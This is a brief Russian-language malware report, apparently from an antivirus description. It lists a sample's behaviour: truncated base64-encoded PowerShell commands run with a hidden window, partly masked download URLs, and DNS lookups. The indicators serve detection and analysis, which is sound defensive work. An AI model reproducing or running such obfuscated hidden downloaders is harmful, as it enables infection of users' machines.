Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABXADEAdQB5AGgAdwB5AD0AWwBjAGgAYQByAF0ANAAyADsAJABSAHAANwAzAGoAaQAxAD0AKAAoACcAVgAnACsAJwBzAHUAJwApACsAKAAnAHMAZgBxACcAKwAnAG4AJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtAGkAJw...
- http://ri###utra.com/img/YX1/
- http://gu##any.net/zefiro/ZO/
- DNS ASK ri###utra.com
- DNS ASK sw###ecure.com
- DNS ASK gu##any.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABXADEAdQB5AGgAdwB5AD0AWwBjAGgAYQByAF0ANAAyADsAJABSAHAANwAzAGoAaQAxAD0AKAAoACcAVgAnACsAJwBzAHUAJwApACsAKAAnAHMAZgBxACcAKwAnAG4AJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtAGkAJw...' (со скрытым окном)